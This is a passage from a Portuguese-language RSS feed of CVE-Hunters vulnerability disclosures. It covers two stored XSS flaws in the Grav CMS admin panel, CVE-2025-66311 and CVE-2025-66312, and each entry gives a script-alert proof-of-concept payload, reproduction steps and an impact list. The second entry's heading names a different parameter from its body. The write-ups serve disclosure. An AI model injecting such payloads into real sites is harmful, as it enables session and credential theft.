	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66311</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-66311/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-66311/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66311-cross-site-scripting-xss-armazenado-no-endpoint-adminpagespage-em-múltiplos-parâmetros&amp;#34;&amp;gt;CVE-2025-66311: Cross-Site Scripting (XSS) Armazenado no Endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; em Múltiplos Parâmetros
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66311&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66311&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Foi identificada uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada em múltiplos endpoints: &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;data[header][metadata]&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data[header][taxonomy][category]&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;data[header][taxonomy][tag]&amp;lt;/code&amp;gt;. Esses scripts são armazenados no frontmatter da página e executados automaticamente sempre que a página afetada é acessada ou renderizada na interface administrativa.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66311-cross-site-scripting-xss-armazenado-no-endpoint-adminpagespage-em-múltiplos-parâmetros&amp;#34;&amp;gt;CVE-2025-66311: Cross-Site Scripting (XSS) Armazenado no Endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; em Múltiplos Parâmetros
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66311&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66311&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Foi identificada uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada em múltiplos endpoints: &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;data[header][metadata]&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data[header][taxonomy][category]&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;data[header][taxonomy][tag]&amp;lt;/code&amp;gt;. Esses scripts são armazenados no frontmatter da página e executados automaticamente sempre que a página afetada é acessada ou renderizada na interface administrativa.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /admin/pages/[page]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;data[header][metadata]&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data[header][taxonomy][category]&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data[header][taxonomy][tag]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue higienizar corretamente a entrada do usuário ao salvar metadados da página ou campos de taxonomia por meio do Painel de Administração. Como resultado, um invasor com acesso à interface administrativa pode injetar um script malicioso usando esses parâmetros, e o script será armazenado no frontmatter YAML da página. Quando a página ou os metadados são renderizados (especialmente no Painel de Administração), o payload é executado no navegador de qualquer usuário com acesso.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS51&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para Reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no Painel de Administração do Grav e navegue até &amp;lt;b&amp;gt;Páginas&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Crie ou edite uma página.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Insira o código acima em qualquer um dos seguintes campos na aba Opções: &amp;lt;b&amp;gt;Nome da chave de Metadados&amp;lt;/b&amp;gt;; &amp;lt;b&amp;gt;Categoria&amp;lt;/b&amp;gt; em Taxonomia; &amp;lt;b&amp;gt;Tag&amp;lt;/b&amp;gt; em Taxonomia:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66311/image.png&amp;#34;
	width=&amp;#34;1889&amp;#34;
	height=&amp;#34;772&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66311/image_hu_129d0e4604e7b1d0.png 480w, /p/cve-2025-66311/image_hu_380b4f06d4f89362.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;244&amp;#34;
		data-flex-basis=&amp;#34;587px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66311/image-1.png&amp;#34;
	width=&amp;#34;848&amp;#34;
	height=&amp;#34;680&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66311/image-1_hu_cc5fbfca26033db6.png 480w, /p/cve-2025-66311/image-1_hu_84c2ecb12a0e25dd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;124&amp;#34;
		data-flex-basis=&amp;#34;299px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Salve a página.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66311/image-2.png&amp;#34;
	width=&amp;#34;1093&amp;#34;
	height=&amp;#34;559&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66311/image-2_hu_9166270826c0da33.png 480w, /p/cve-2025-66311/image-2_hu_25d09907adc2064.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;195&amp;#34;
		data-flex-basis=&amp;#34;469px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Quando a página é carregada novamente no Painel de Administração ou, potencialmente, no frontend (dependendo de como os metadados são usados), o script é executado, confirmando a vulnerabilidade de XSS armazenado.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66312</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-66312/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-66312/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66312-cross-site-scripting-xss-armazenado-no-parêmetro-dataheadertemplate-do-endpoint-adminpagespage-na-guia-avançado&amp;#34;&amp;gt;CVE-2025-66312: Cross-Site Scripting (XSS) Armazenado no Parêmetro &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; na guia Avançado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66312&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66312&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;/admin/accounts/groups/Grupo&amp;lt;/code&amp;gt; do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt;. O script é salvo no frontmatter da página e executado automaticamente sempre que o conteúdo afetado é renderizado na interface administrativa ou na visualização do frontend.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66312-cross-site-scripting-xss-armazenado-no-parêmetro-dataheadertemplate-do-endpoint-adminpagespage-na-guia-avançado&amp;#34;&amp;gt;CVE-2025-66312: Cross-Site Scripting (XSS) Armazenado no Parêmetro &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; na guia Avançado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66312&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66312&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;/admin/accounts/groups/Grupo&amp;lt;/code&amp;gt; do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt;. O script é salvo no frontmatter da página e executado automaticamente sempre que o conteúdo afetado é renderizado na interface administrativa ou na visualização do frontend.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;POST /admin/accounts/groups/Grupo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;lt;ScRipT&amp;amp;gt;alert(&amp;amp;#39;PoC-XSS&amp;amp;#39;)&amp;amp;lt;/ScRipT&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Navegue até &amp;lt;b&amp;gt;Contas &amp;gt; Grupos&amp;lt;/b&amp;gt; no painel administrativo.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Crie um novo grupo ou edite um existente.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;No campo &amp;lt;b&amp;gt;Nome de Exibição&amp;lt;/b&amp;gt; (que corresponde a &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt;), insira o payload acima e salve as alterações.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66312/image.png&amp;#34;
	width=&amp;#34;1309&amp;#34;
	height=&amp;#34;549&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66312/image_hu_56c71e0062372f4f.png 480w, /p/cve-2025-66312/image_hu_765f3adc436b0b52.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;572px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;A seguinte solicitação HTTP foi gerada durante esta ação:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66312/image-1.png&amp;#34;
	width=&amp;#34;849&amp;#34;
	height=&amp;#34;669&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66312/image-1_hu_635bb1670341f446.png 480w, /p/cve-2025-66312/image-1_hu_79252ce353d0bcdd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;126&amp;#34;
		data-flex-basis=&amp;#34;304px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Em seguida, acesse &amp;lt;b&amp;gt;Contas &amp;gt; Usuários&amp;lt;/b&amp;gt; e abra qualquer perfil de usuário.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66312/image-2.png&amp;#34;
	width=&amp;#34;1307&amp;#34;
	height=&amp;#34;560&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66312/image-2_hu_cc964237802c91e6.png 480w, /p/cve-2025-66312/image-2_hu_ea8f2a27d7b43b7f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;560px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;O script malicioso é executado imediatamente no navegador quando a página carrega, confirmando a existência de uma vulnerabilidade XSS armazenada.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66312/image-3.png&amp;#34;
	width=&amp;#34;945&amp;#34;
	height=&amp;#34;446&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66312/image-3_hu_f451aa2b0f343379.png 480w, /p/cve-2025-66312/image-3_hu_82084485c0851189.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;211&amp;#34;
		data-flex-basis=&amp;#34;508px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-65013</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-65013/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-65013/</guid>
